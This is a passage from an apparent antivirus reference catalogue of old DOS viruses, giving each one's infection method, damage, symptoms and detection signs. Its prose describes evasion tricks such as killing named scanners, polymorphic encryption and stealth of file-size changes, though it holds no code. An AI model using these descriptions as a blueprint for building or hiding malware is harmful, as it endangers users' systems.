  11346. 2) An error message appears when writing because INT 24h has not been
  11347.    hanged.
  11348.  
  11349. Detection Method: Infected files increase by 2048 bytes.
  11350.  
  11351. [4915]
  11352. Virus Name: 4915
  11353. Virus Type: File Virus (EXE files)
  11354. Virus Length:
  11355.  
  11356. Execution Procedure: Searches for all uninfected EXE files on
  11357. the current directory in A, and then proceeds to infect them.
  11358.  
  11359. Damage: It overwrites the original files with the virus code, thus
  11360. corrupting the files.
  11361.  
  11362. Note:
  11363. 1) Does not stay in the memory.
  11364. 2) An error message appears when writing because INT 24h has not been
  11365.    hanged.
  11366. 3) This virus was written using an advanced programming language.
  11367.  
  11368. [MSJ]
  11369. Virus Name: Msj
  11370. Virus Type: File Virus (EXE and COM files)
  11371. Virus Length: 15395 bytes
  11372.  
  11373. Execution Procedure: Searches for an uninfected EXE file on the current
  11374. directory in A, B or C, then proceeds to infect it. It only infects one
  11375. file at a time.
  11376.  
  11377. Damage: None
  11378.  
  11379. Note:
  11380. 1) Does not stay in the memory.
  11381. 2) An error message appears when writing because INT 24h has not been
  11382.    hanged.
  11383. 3) This virus was written using an advanced programming language.
  11384.  
  11385. Detection method: Infected files increase by 15395 bytes.
  11386.  
  11387. [Pa-5220]
  11388. Virus Name: Pa-5220
  11389. Virus Type: File Virus (EXE and COM files)
  11390. Virus Length:
  11391.  
  11392. Execution Procedure: Searches for an uninfected COM or EXE file on the
  11393. current directory in A, B or C, then infects it. It only infects one
  11394. file at a time.
  11395.  
  11396. Damage: It overwrites the original files with the virus code, thus
  11397. corrupting the files.
  11398.  
  11399. Note:
  11400. 1) Does not stay in the memory.
  11401. 2) An error message appears when writing because INT 24h has not been
  11402.    hanged.
  11403. 3) This virus was written using an advanced programming language.
  11404.  
  11405. [PCBB-11]
  11406. Virus Name: Pcbb11
  11407. Virus Type: File Virus (EXE and COM files)
  11408. Virus Length: 3052 bytes
  11409. PC Vectors Hooked: INT 21h, INT 24h
  11410.  
  11411. Execution Procedure:
  11412. 1) Checks whether it is memory resident. If not, it loads itself
  11413.     resident in the high memory.
  11414. 2) Hooks INT 21h and goes back to the original routine.
  11415.  
  11416. Infection Procedure:
  11417. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11418.     prevent divulging its trace when writing. If the program to be
  11419.     executed is an uninfected COM or EXE file, the virus proceeds to
  11420.     infect it.
  11421.  
  11422. Damage:
  11423.  
  11424. Detection method: Infected files increase by 3052 bytes.
  11425.  
  11426. [Bow]
  11427. Virus Name: Bow
  11428. Virus Type: File Virus (EXE and COM files)
  11429. Virus Length:  5856 bytes
  11430.  
  11431. PC Vectors Hooked: INT 21h
  11432.  
  11433. Execution Procedure:
  11434. 1) Checks whether it is memory resident. If not, it loads itself
  11435.    resident in the high memory.
  11436. 2) Hooks INT 21h and goes back to the original routine.
  11437.  
  11438. Infection Procedure:
  11439. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11440.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  11441.  
  11442. Damage: None
  11443.  
  11444. Note:
  11445. 1) An error message appears when writing because INT 24h has not been
  11446.    hanged.
  11447. 2) This virus was written using an advanced programming language.
  11448.  
  11449. Detection Method: Infected files increase by 5856 bytes.
  11450.  
  11451. [PCBB-3072]
  11452. Virus Name: Pcbb3072
  11453. Virus Type: File Virus (EXE and COM files)
  11454. Virus Length: 3,072 bytes
  11455. PC vectors Hooked: INT 21h, INT 24h
  11456.  
  11457. Execution Procedure:
  11458. 1) Checks whether it is memory resident. If not, it loads itself
  11459.     resident in the high memory.
  11460. 2) Hooks INT 21h and goes back to the original routine.
  11461.  
  11462. Infection Procedure:
  11463. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11464.     prevent divulging its trace when writing. If the program to be
  11465.     executed is an uninfected COM or EXE file, the virus proceeds
  11466.     to infect it.
  11467.  
  11468. Damage:
  11469.  
  11470. Detection Method: Infected files increase by 3072 bytes.
  11471.  
  11472. [Terminal]
  11473. Virus Name: Terminal
  11474. Virus Type: File Virus (EXE and COM files)
  11475. Virus Length:
  11476.  
  11477. Execution Procedure: Searches for an uninfected EXE file on
  11478. the current directory in C, then infects it.
  11479.  
  11480. Damage: It overwrites the original files with the virus code, thus
  11481. corrupting the files.
  11482.  
  11483. Note:
  11484. 1) Does not stay in the memory.
  11485. 2) An error message appears when writing because INT 24h has not been
  11486.    hanged.
  11487. 3) This virus was written using an advanced programming language.
  11488. 4) This virus is encrypted by a program like PKLITE. Although it
  11489.    has a pattern, we were not able to scan it.
  11490.  
  11491. [Lanc]
  11492. Virus Name: Lanc
  11493. Virus Type: File Virus (EXE files)
  11494. Virus Length: 7,376 bytes
  11495.  
  11496. Execution Procedure:
  11497. 1) Searches for an uninfected EXE file on the current directory.
  11498. 2) Creates a new COM file with the same file name as the original EXE
  11499.     file. This new COM file contains the virus.
  11500.  
  11501. Damage: None
  11502.  
  11503. Note:
  11504. 1) Does not stay in the memory.
  11505. 2) An error message appears when writing because INT 24h has not been
  11506.     hanged.
  11507. 3) This virus was written using an advanced programming language.
  11508.  
  11509. Detection method: Check whether the file length is 7376 bytes.
  11510.  
  11511. [Nazi-Phobia]
  11512. Virus Name: Nazi-Phobia
  11513. Virus Type: File Virus (EXE files)
  11514. Virus Length:
  11515.  
  11516. Execution Procedure: Searches for an uninfected EXE file on the
  11517. current directory, then infects it. It only infects one file at a
  11518. time.
  11519.  
  11520. Damage: It overwrites the original files with the virus code, thus
  11521. corrupting the files.
  11522.  
  11523. Note:
  11524. 1) Does not stay in the memory.
  11525. 2) An error message appears when writing because INT 24h has not been
  11526.    hanged.
  11527. 3) This virus was written using an advanced programming language.
  11528.  
  11529. [Animus]
  11530. Virus Name: Animus
  11531. Virus Type: File Virus (COM and EXE files)
  11532. Virus Length: 7,360 or 7,392 bytes
  11533.  
  11534. Execution Procedure: Searches for an uninfected COM or EXE file on the
  11535. current directory, then infects it. It only infects two or three files
  11536. at a time.
  11537.  
  11538. Damage: None
  11539.  
  11540. Note:
  11541. 1) Does not stay in the memory.
  11542. 2) An error message appears when writing because INT 24h has not been
  11543.    hanged.
  11544. 3) This virus was written using an advanced programming language.
  11545.  
  11546. Detection method: Infected files increase by 7360 or 7392 bytes.
  11547.  
  11548. [Hitler]
  11549. Virus Name: Hitler
  11550. Virus Type: File Virus (COM files)
  11551. Virus Length:  4,808 bytes
  11552.  
  11553. PC Vectors Hooked: INT 21h, INT 24h
  11554.  
  11555. Execution Procedure:
  11556. 1) Checks whether it is memory resident. If not, it loads itself
  11557.    resident in the high memory.
  11558. 2) Hooks INT 21h and goes back to the original routine.
  11559.  
  11560. Infection Procedure:
  11561. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11562.    prevent divulging its trace when writing. If the program to be
  11563.    executed is an uninfected COM file, the virus proceeds to infect it.
  11564.  
  11565. Damage: None
  11566.  
  11567. Detection method: Infected files increase by 4808 bytes.
  11568.  
  11569. [Hellwean-1182]
  11570. Virus Name: Hellwean1182
  11571. Virus Type: File Virus (EXE and COM files)
  11572. Virus Length:  1182 bytes
  11573.  
  11574. PC Vectors Hooked: INT 21h, INT 24h
  11575.  
  11576. Execution Procedure:
  11577. 1) Checks whether it is memory resident. If not, it loads itself
  11578.    resident in the high memory.
  11579. 2) Hooks INT 21h and goes back to the original routine.
  11580.  
  11581. Infection Procedure:
  11582. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11583.    prevent divulging its trace when writing. If the program to be
  11584.    executed is an uninfected COM or EXE file, the virus proceeds to
  11585.    infect it.
  11586.  
  11587. Damage: None
  11588.  
  11589. Detection method: Infected files increase by 1182 bytes.
  11590.  
  11591. [Minsk-GH]
  11592. Virus Name: Minsk-Gh
  11593. Virus Type: File Virus (EXE and COM files)
  11594. Virus Length:  1450-1490 bytes
  11595.  
  11596. PC Vectors Hooked: INT 21h, INT 24h
  11597.  
  11598. Execution Procedure:
  11599. 1) Checks whether it is memory resident. If not, it loads itself
  11600.    resident in the high memory.
  11601. 2) Hooks INT 21h and goes back to the original routine.
  11602.  
  11603. Infection Procedure:
  11604. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11605.    prevent divulging its trace when writing. If the program to be
  11606.    executed is an uninfected COM or EXE file, the virus proceeds to
  11607.    infect it.
  11608.  
  11609. Damage: None
  11610.  
  11611. Note: This virus cannot run on DOS 5.0.
  11612.  
  11613. Detection method: Infected files increase by 1450-1490 bytes.
  11614.  
  11615. [LV]
  11616. Virus Name: Lv
  11617. Virus Type: File Virus (COM files)
  11618. Virus Length:
  11619. PC Vectors Hooked: INT 21h, INT 24h
  11620.  
  11621. Execution Procedure:
  11622. 1) Checks whether it is memory resident. If not, it loads itself
  11623.     resident in the high memory.
  11624. 2) Hooks INT 21h and then checks whether COMMAND.COM that booted up the
  11625.     system is infected or not. If not, the virus infects it and returns
  11626.     to the original routine.
  11627.  
  11628. Infection Procedure:
  11629. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  11630.     prevent divulging its trace when writing. If the program to be
  11631.     executed is an uninfected COM file, the virus proceeds to infect
  11632.     it.
  11633.  
  11634. Damage: It overwrites the original files with the virus code, thus
  11635. corrupting the files.
  11636.  
  11637. [Mini-207]
  11638. Virus Name: Mini-207
  11639. Virus Type: File Virus (COM files)
  11640. Virus Length:  207 bytes
  11641.  
  11642. Execution Procedure: Searches for all uninfected COM files on the
  11643. current directory, then infects them.
  11644.  
  11645. Note:
  11646. 1) Does not stay in the memory.
  11647. 2) An error message appears when writing because INT 24h has not been
  11648.    hanged.
  11649.  
  11650. Damage: It overwrites the original files with the virus code, thus
  11651. corrupting the files.
  11652.  
  11653. [Brother_300]
  11654. Virus Name: Brother_300
  11655. Virus Type: File Virus (EXE files)
  11656. Virus Length:  300 bytes
  11657. PC Vectors Hooked: INT 21h, INT 24h
  11658.  
  11659. Execution Procedure:
  11660. 1) Checks whether it is memory resident. If not, it loads itself
  11661.     resident in the high memory.
  11662. 2) Hooks INT 21h and goes back to the original routine.
  11663.  
  11664. Infection Procedure:
  11665. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11666.     prevent divulging its trace when writing. If the program to be
  11667.     executed is an uninfected EXE file, it creates a new COM file
  11668.     with the same name as the EXE file. This new COM file contains
  11669.     the virus. Its length is 300 bytes.
  11670.  
  11671. Damage: None
  11672.  
  11673. Detection method: Checks whether the file's length is 300 bytes.
  11674.  
  11675. [Lip-286]
  11676. Virus Name: Lip-286
  11677. Virus Type: File Virus (COM files)
  11678. Virus Length: 286 bytes
  11679.  
  11680. Execution Procedure: Searches for an uninfected COM file on the
  11681. current directory, then infects it. It infects two or three files at
  11682. a time.
  11683.  
  11684. Damage: There is a flag in the virus procedure (every infected file
  11685. has a different flag). The flag decreases by 1 every time the virus
  11686. infects a file. When the flag reaches zero, the virus will destroy
  11687. all data on the hard disk.
  11688.  
  11689. Note:
  11690. 1) Does not stay in the memory.
  11691. 2) An error message appears when writing because INT 24h has not been
  11692.    hanged.
  11693.  
  11694. Detection method: Infected files increase by 286 bytes.
  11695.  
  11696. [Gomb]
  11697. Virus Name: Gomb
  11698. Virus Type: File Virus (COM files)
  11699. Virus Length:  4093 bytes
  11700.  
  11701. PC Vectors Hooked: INT 21h
  11702.  
  11703. Execution Procedure:
  11704. 1) Checks whether it is memory resident. If not, it loads itself
  11705.    resident in the high memory.
  11706. 2) Hooks INT 21h and goes back to the original routine.
  11707.  
  11708. Infection Procedure:
  11709. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11710.    is an uninfected COM file, the virus proceeds to infect it.
  11711.  
  11712. Damage: None
  11713.  
  11714. Detection method: Infected files increase by 4093 bytes.
  11715.  
  11716. [Bert]
  11717. Virus Name: Bert
  11718. Virus Type: File Virus (COM and EXE files)
  11719. Virus Length:  2294 bytes
  11720.  
  11721. PC Vectors Hooked: INT 21h
  11722.  
  11723. Execution Procedure:
  11724. 1) Checks whether it is memory resident. If not, it loads itself
  11725.    resident in the high memory.
  11726. 2) Hooks INT 21h and goes back to the original routine.
  11727.  
  11728. Infection Procedure:
  11729. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11730.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  11731.  
  11732. Damage: None
  11733.  
  11734. Detection method: Infected files increase by 2294 bytes.
  11735.  
  11736. [Triple Shot]
  11737. Virus Name: Triple-shot
  11738. Virus Type: File Virus (EXE files)
  11739. Virus Length: 6610
  11740.  
  11741. Execution Procedure: Searches for an uninfected EXE file on the
  11742. current directory. Then creates a new hidden COM file with the
  11743. same name as the EXE file. This new COM file is the virus. Its
  11744. length is 6610 bytes.
  11745.  
  11746. Damage: None
  11747.  
  11748. Note:
  11749. 1) Does not stay in the memory.
  11750. 2) An error message appears when writing because INT 24h has not been
  11751.    hanged.
  11752.  
  11753. Detection method: Check whether the file's length is 6610 bytes.
  11754.  
  11755. [Fame]
  11756. Virus Name: Fame
  11757. Virus Type: File Virus (EXE files)
  11758. Virus Length:  896 bytes
  11759.  
  11760. PC Vectors Hooked: INT 21h, INT 24h
  11761.  
  11762. Execution Procedure:
  11763. 1) Checks whether it is memory resident. If not, it loads itself
  11764.    resident in the high memory.
  11765. 2) Hooks INT 21h and goes back to the original routine.
  11766.  
  11767. Infection Procedure:
  11768. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  11769.    prevent divulging its trace when writing. If the program to be
  11770.    executed is an uninfected EXE file, the virus proceeds to infect it.
  11771.  
  11772. Damage: None
  11773.  
  11774. Detection method: Infected files increase by 896 bytes.
  11775.  
  11776. [CCCP]
  11777. Virus Name: Cccp
  11778. Virus Type: File Virus (COM files)
  11779. Virus Length: 510 bytes
  11780.  
  11781. Execution Procedure: Searches for an uninfected COM file on the
  11782. current directory, then infects it. It infects two or three files at
  11783. a time.
  11784.  
  11785. Damage: There is a flag (valued 0 to 25) in the virus procedure
  11786. (every infected file has a different flag). When an infected file
  11787. with flag of 25 is executed, the virus will destroy all data on the
  11788. hard disk.
  11789.  
  11790. Note:
  11791. 1) Does not stay in the memory.
  11792. 2) An error message appears when writing because INT 24h has not been
  11793.    hanged.
  11794.  
  11795. Detection method: Infected files increase by 510 bytes.
  11796.  
  11797. [L1]
  11798. Virus Name: L1
  11799. Virus Type: File Virus (COM files)
  11800. Virus Length:  140 bytes
  11801.  
  11802. PC Vectors Hooked: INT 21h
  11803.  
  11804. Execution Procedure:
  11805. 1) Checks whether it is memory resident. If not, it loads itself
  11806.    resident in the high memory.
  11807. 2) Hooks INT 21h and goes back to the original routine.
  11808.  
  11809. Infection Procedure:
  11810. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  11811.    is an uninfected COM file, the virus proceeds to infect it.
  11812.  
  11813. Damage: None
  11814.  
  11815. Note: An error message appears when writing because INT 24h has not been
  11816. hanged.
  11817.  
  11818. Detection method: Infected files increase by 140 bytes.
  11819.  
  11820. [Crepate]
  11821. Virus Name: Crepate
  11822. Virus Type: File Virus
  11823.             Virus infects .COM between 400 and 62000 bytes,
  11824.             .EXE shorter than 589824 bytes. Virus is Memory Block
  11825.             Resident.
  11826. Virus Length:  2910 bytes (file), 4K bytes (memory).
  11827. Interrupt Vectors Hooked: INT 21h
  11828.  
  11829. Infection Process: Every infected file becomes 2910 bytes longer,
  11830. with the virus code at the end and some kind of a header created
  11831. by the virus. The second group of bytes indicating the time of
  11832. creation of the file, is set to 31 (1Fh). Every subsequent file
  11833. infection, the virus resets the system memory from address 0:413
  11834. to 280h (640 K).
  11835.  
  11836. Damage:  Virus formats the hard disk.
  11837.  
  11838. Symptoms: Loss of data stored in the last 7 sectors of the diskette,
  11839. loss of data stored in the last cylinder, first side, first 7 sectors,
  11840. increased file size.
  11841.  
  11842. Note: This virus doesn't infect files named as : "*AN.???" or
  11843. "*LD.???" To recognize the virus presence in the boot sector one
  11844. can look for:
  11845. - a byte valued FFh in the offset 4 in floppy disks.
  11846. - a word valued 2128h in the offset 4 in hard disks.
  11847.  
  11848. Furthermore, at the end of each infected file, a text string can
  11849. be found:
  11850.  
  11851.     "Crepa (C) bye R.T.".
  11852.  
  11853. This text can be easily modified. The DOS Chkdsk command, when
  11854. the virus is resident, reveals a decrease of 4K bytes in the available
  11855. memory.
  11856.  
  11857. [Die Lamer]
  11858. Virus Name: DIE LAMER
  11859. Virus Type: Resident at the top of the MCB (Memory Control
  11860.             Block).
  11861. Virus Length: 1,136 bytes
  11862.  
  11863. Interrupt Vectors Hooked: INT 21h
  11864.  
  11865. Infection Process:
  11866. This virus is spread by executing an infected program. When a DIE
  11867. LAMER infected program is executed, it will first check to see if
  11868. it is already resident in the memory by checking if address 0:4f2h
  11869. contains the value 3232h. If it is already in the memory it will
  11870. execute the infected program. If not, it will perform the following
  11871. functions:
  11872.  
  11873. Damage: Loss of some data stored in the floppy.
  11874.  
  11875. Symptoms: Garbage in floppy disk. Increased file sizes. Screen
  11876. displays:
  11877.  
  11878.           "-=*@DIE_LAMER@*=-."
  11879.  
  11880. Note: The method used by the virus is very dangerous, because if
  11881. an anti-virus program catches this virus in the memory and displays
  11882. the message: "found '-=*@DIE_LAMER@*=-' in memory", the virus
  11883. will only write garbage to the floppy, but the virus program can be
  11884. easily modified to execute more destructive routines (such as
  11885. formatting the hard disk, etc...).
  11886.  
  11887. [FaxFree]
  11888. Virus Name: FAXFREE
  11889. Virus Type: File Virus
  11890.             Virus infects .COM and .EXE files as long as they are
  11891.             longer than 32 bytes, and shorter than 131,072
  11892.             bytes. Infects Partition record. File Virus.
  11893. Virus Length: 3 Kb
  11894.  
  11895. PC Vectors Hooked: INT 21h
  11896.  
  11897. Infection Process: This virus can be spread by executing an
  11898. infected program or from booting the system with an infected
  11899. disk. There are several methods of infection. When an infected
  11900. program is executed in a clean system, the virus first removes
  11901. the contents of the original partition sector of the hard disk to
  11902. the last sector of the last side of the last cylinder.  Then the
  11903. virus will copy itself in the last side of the last cylinder,
  11904. beginning from the 9th last sector to the 6th last sector.  These
  11905. sectors are not marked as "bad sectors" and get overwritten by
  11906. the virus, with no regards for their previous contents.
  11907.  
  11908. Damage: Hangs the system.  Infected files will increase in length by
  11909. 2048 bytes, with the virus code file infection.
  11910.  
  11911. Symptoms: When the virus wants to replace the original partition
  11912. sector, it needs to decrypt some data which after decryption
  11913. shows the following text strings :
  11914.  
  11915.     "PISello tenere fuori dalla portata dei bambini.
  11916.     PaxTibiQuiLegis.FaxFree!!"
  11917.  
  11918. Note: This virus doesn't infect files named as : "*AN.???" ,
  11919. "*OT.???" or "*ND.???" If the system date is between the 25th and
  11920. 30th of April, the virus will hang the system. The virus uses a
  11921. smart technique to avoid anti-virus detection programs, when
  11922. modifying the partition sector that is hooking int 01h, it will
  11923. turn on a single step flag to get the original entry of DOS
  11924. hooked.  The virus will then move itself to the top of the MCB
  11925. (Memory Control Block), and decrease available memory in the MCB
  11926. by 3Kb.  It will hook Int 13h and Int 21h and then run the
  11927. original program.
  11928.  
  11929. [Ghost Player]
  11930. Virus Name: GHOST PLAYER
  11931. Virus Type: File Virus (EXE files), Memory Block Resident
  11932. Virus Length: 1,200 bytes
  11933.  
  11934. PC Vectors Hooked: INT 21h
  11935.  
  11936. Infection Process: This virus is spread by executing an infected
  11937. program. When a GHOST PLAYER infected program is executed, if DOS
  11938. version is greater than 3 and the serial number of default disk
  11939. equals zero, virus will execute the infected program. Otherwise
  11940. virus performs the following functions: virus stays resident at
  11941. the top of the MCB (memory control block)  but below the DOS 640k
  11942. boundary. The available free memory will decrease by 1200 (4B0H)
  11943. bytes.
  11944.  
  11945. Damage:  Virus increases file lengths.
  11946.  
  11947. Symptoms: Decreased available memory. If a random value is equal
  11948. to FF00, the virus displays the following message: " !  Bumpy"
  11949. Furthermore, the screen shakes up and down.
  11950.  
  11951. Note: The virus doesn't infect files named as : "TB*.???" , "F-*.???"
  11952. , "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???".
  11953.  
  11954. [Gold Bug]
  11955. Virus Name: GOLD-BUG
  11956. Virus Type: Spawning Color Video Resident and Extended HMA Memory
  11957.             Resident Boot-Sector and Master-Sector Infector
  11958. Virus Length: 1,024 Bytes
  11959.  
  11960. Interrupt Vectors Hooked: INT 21h, INT 13h
  11961.  
  11962. Infection Process: GOLD-BUG is a memory-resident multipartite
  11963. polymorphic stealthing boot-sector spawning anti-antivirus virus
  11964. that works with DOS 5 and DOS 6 in the HIMEM.SYS memory.  When an
  11965. .EXE program infected with the GOLD-BUG virus is run, it
  11966. determines if it is running on an 80186 or better, if not it will
  11967. terminate and not install. If it is on an 80186 or better it will
  11968. copy itself to the partition table of the hard disk and remain
  11969. resident in memory in the HMA (High Memory Area) only if the HMA
  11970. is available, i.e., DOS=HIGH in the CONFIG.SYS file else no
  11971. infection will occur. The old partition table is moved to sector
  11972. 14 and the remainder of the virus code is copied to sector 13.
  11973. The virus then executes the spawned associated file if present.
  11974. INT 13 and INT 2F are hooked into at this time but not INT 21.
  11975. The spawning feature of this virus is not active now.
  11976.  
  11977. Damage: The GOLD-BUG virus also has an extensive anti-antivirus
  11978. routine.  It writes to the disk using the original BIOS INT 13
  11979. and not the INT 13 chain that these types of programs have hooked
  11980. into.  It hooks into the bottom of the interrupt chain rather
  11981. than changing and hooking interrupts. If the GOLD-BUG virus is
  11982. resident in memory, any attempts to run most virus scanners will
  11983. be aborted. GOLD-BUG stops any large .EXE file (greater than 64k)
  11984. with the last two letters of "AN" to "AZ".  It will stop
  11985. SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE,
  11986. TNTAV.EXE, and so on. The SCAN program will either be deleted or
  11987. an execution error will return.  Also, GOLD-BUG will cause a CMOS
  11988. checksum failure to happen the next time the system boots up. GOLD-BUG
  11989. also erases "CHKLIST.???" created by CPAV.EXE and MSAV.EXE.
  11990. Programs that do an internal checksum on themselves will not
  11991. detect any changes.
  11992.  
  11993. Symptoms: CMOS checksum failure.  Creates files with no
  11994. extension; Modem answers on 7th ring.  Most virus scanners fail
  11995. to run or are Deleted. And CHKLIST.??? files are deleted.
  11996.  
  11997. Note: The GOLD-BUG virus is also Polymorphic. Each .EXE file it
  11998. creates only has 2 bytes that remain constant. It can mutate
  11999. into 128 different decryption patterns. It uses a double
  12000. decryption technique that involves INT 3 that makes it very
  12001. difficult to decrypt using a debugger.  The assembly code allowed
  12002. for 512 different front-end decryptors. Each of these can mutate
  12003. 128 different ways.
  12004.  
  12005. [Invisible Man]
  12006. Virus Name: INVISIBLE MAN
  12007. Virus Type: File Virus (COM and EXE files), Partition,
  12008.             Boot record, Memory Block Resident
  12009. Virus Length: 2926 Bytes (file), D80h Bytes (memory)
  12010.  
  12011. Interrupt Vectors Hooked:  INT 21h
  12012.  
  12013. Infection Process:
  12014. This virus can spread by executing an infected program or by
  12015. booting the system from an infected disk. There are several
  12016. different methods of infection:
  12017.  
  12018. (1). When an INVISIBLE MAN infected program is executed it will;
  12019.  
  12020.       A. Infect the hard disk partition table :
  12021.      (i) Write the virus body to the last 7 sectors of the active
  12022.          hard disk.
  12023.     (ii) The ending location of the active hard disk will be
  12024.          decreased by 7 sectors.
  12025.    (iii) Write the virus loader to the partition sector. This
  12026.          sector will be encrypted.
  12027.  
  12028.       B. Modify the boot sector:
  12029.       It will change the total sector numbers message, which will
  12030.       be seven less than the original figure.
  12031.  
  12032. Damage: The virus displays a message and plays music on the system
  12033. speaker.
  12034.  
  12035. Symptoms:
  12036. Loss of data stored in the last 7 sectors of the hard disk;
  12037. increased file sizes. File sizes increase by 2926 bytes.  Virus
  12038. displays the following message:
  12039.  
  12040.     "I'm the invisible man, I'm the invisible man Incredible how
  12041.      you can See right through me."
  12042.  
  12043. Virus also plays music on the system speaker.
  12044.  
  12045. [Junkie]
  12046. Virus Name: Junkie
  12047. Virus Type: Memory-Resident Multipartite
  12048. Virus Length:  512 bytes
  12049.  
  12050. Interrupt Vectors Hooked: INT 21h
  12051.  
  12052. Infection Process:
  12053. Once a virus-infected program is run, the virus installs itself
  12054. in the memory as a terminate-and-stay-resident program. On the
  12055. system area of the hard disk, the virus copies two 512-byte
  12056. sectors of code into the first track of the hard disk. The virus
  12057. then modifies the existing master boot record of the hard disk to
  12058. read the extra sectors and execute them upon boot-up.
  12059.  
  12060. Damage:  Virus adds approx. 1,024 bytes of virus code at the end
  12061. of infected files.
  12062.  
  12063. [March 25th]
  12064. Virus Name: March-25th
  12065. Virus Type: File Virus (EXE and COM files). The MARCH-25H
  12066.             virus will infect .COM and .EXE files which are
  12067.             shorter than 196608 Bytes in length.
  12068. Virus Length: 1056 Bytes
  12069.  
  12070. Interrupt Vectors Hooked: INT 21h
  12071.  
  12072. Infection Process:
  12073. This virus is spread by executing an infected program. When a
  12074. MARCH-25H infected program is executed, it will check to see if
  12075. it is already resident in the memory by checking if address 0:212h
  12076. contains the value F100h. If it is already in the memory it will
  12077. execute the infected program. Virus stays resident at the top of
  12078. the MCB (memory control block) but below the DOS 640k boundary.
  12079. The available free memory will decrease by 1056 (420H) bytes.
  12080. It will infect .EXE and .COM programs when they are executed from
  12081. the hard disk.
  12082.  
  12083. Damage:
  12084. The virus destroys the hard disk. Infected files will have a file
  12085. length increase of 1025 - 1040 (401h - 410h) bytes with the virus being
  12086. located at the end of the file.
  12087.  
  12088. Symptoms: Virus causes data loss on the C drive.
  12089.  
  12090. Note:
  12091. If the system date is March 25 of any year, the virus will proceed to
  12092. write garbage to:
  12093. C drive sector 0 - 6 , cylinder 0 , head 0
  12094. C drive sector 1 - 7 , cylinder 1 , head 0
  12095. C drive sector 1 - 7 , cylinder 2 , head 0."
  12096.  
  12097. [Minosse]
  12098. Virus Name: MINOSSE
  12099. Virus Type: File Virus (EXE files), MBR
  12100. Virus Length: 5772 bytes
  12101.  
  12102. PC Vectors Hooked: INT 21h
  12103.  
  12104. Infection Process:
  12105. MINOSSE is a polymorphic virus which prevents the Debug.exe
  12106. program from tracing this virus. When a MINOSSE infected program
  12107. is executed, it will;
  12108. 1. Hook int 8xh - int 9xh:  (x:any number) First, it will hook
  12109.    int 8xh - 9xh, and then it will run this interrupt to get into
  12110.    virus entry and decrypt the virus body.
  12111. 2. Stay resident at the top of MCB (memory control block) but
  12112.    below the 640k DOS boundary.
  12113.  
  12114. Damage:
  12115. Virus will hang the system when the system date is greater than June
  12116. and the day is the 25th. Infected programs will have a file
  12117. length increase of 3075 bytes with the virus being located at the
  12118. end of the file. The available free memory will decrease by 5772 bytes.
  12119.  
  12120. Symptoms: Decreased available memory. Virus will display the
  12121. following message,
  12122.  
  12123.     "Minose 1V5 (c) 93 WilliWonka."
  12124.  
  12125. Note:
  12126. This virus is a polymorphic and also a very smart virus. It is
  12127. not easy to detect using scan programs because it doesn't have
  12128. the same code for scanning, and it is not easy to find using the
  12129. interrupt vectors because it recovers int 21h to the original vector.
  12130.  
  12131. [Mombasa]
  12132. Virus Name: MOMBASA
  12133. Virus Type: File Virus (COM files)
  12134. Virus Length: 3584 bytes
  12135.  
  12136. PC Vectors Hooked:  INT 21h, INT 08h
  12137.  
  12138. Infection Process:
  12139. MOMBASA is a polymorphic virus and uses INT 01h and INT 03h to
  12140. prevent tracing this virus.  When a MOMBASA infected program is
  12141. executed, it will; Stay resident at the top of MCB (memory
  12142. control block) but below the 640k DOS boundary. The available
  12143. free memory will decrease by 3584 bytes. It will hook int
  12144. 08h to detect if int 21h is changed by another program. If the
  12145. INT 21h vector is changed, the virus will change it's vector to
  12146. the new INT 21h vector and will hook its vector to int 21h again.
  12147. It will infect .COM programs and try to infect C:\COMMAND.COM
  12148. when they are executed.  When MOMBASA is memory resident it will
  12149. hide the file size change because the virus recovers the original
  12150. file length.  When creating a directory, removing a directory,
  12151. or selecting a default drive such as A: or B:, the virus writes some
  12152. data onto the disk/diskette, but without success.
  12153.  
  12154. Damage:
  12155. Screen slowly fades until completely blank.  The system then
  12156. proceeds to hang. Virus destroys the boot sector and FAT of the hard
  12157. drive. Infected programs will have a file length increase of 3568
  12158. bytes with the virus being located at the end of the file.
  12159.  
  12160. Symptoms: Virus displays the following message:
  12161.  
  12162.     "I'm gonna die...Attack radical...Mombosa virus (MM 92')."
  12163.  
  12164. [NOV-17-768]
  12165. Virus Name: NOV-17-768
  12166. Virus Type: File Virus (COM files shorter than 59920 Bytes, EXE)
  12167. Virus Length: 768 Bytes (file), 800 Bytes (memory)
  12168.  
  12169. PC Vectors Hooked: INT 21h
  12170.  
  12171. Infection Process: This virus is a variant of the November-17th
  12172. virus. The November 17th virus was detected in January, 1992. Its
  12173. origin or point of original isolation was originally unknown, but
  12174. it has since been reported as being widespread in Rome, Italy,
  12175. during the month of December, 1991. November 17th is a memory
  12176. resident infector of .COM and .EXE programs, including
  12177. COMMAND.COM. The first time a program infected with November 17th
  12178. is executed, the virus will install itself memory resident at the
  12179. top of the system memory but below the 640K DOS boundary.
  12180.  
  12181. Damage:
  12182. Virus destroys current disk from sector 1 to sector 8. Total
  12183. system and available free memory, as indicated by the DOS CHKDSK
  12184. program, will decrease by 896 bytes.  Interrupt 12's return will
  12185. not have been moved. Interrupts 09 and 21 will be hooked.
  12186.  
  12187. Symptoms: Infected programs will have a file length increase of
  12188. 855 bytes with the virus being located at the end of the infected
  12189. file. There will be no visible change to the file's date and time
  12190. in a DOS disk directory listing
  12191.  
  12192. Note:
  12193.  
  12194. [NOV-17-800]
  12195. Virus Name: NOV-17-800
  12196. Virus Type: File Virus (COM and EXE files), Memory Block
  12197.             Resident. Virus does not infect "SCAN", "CLEAN."
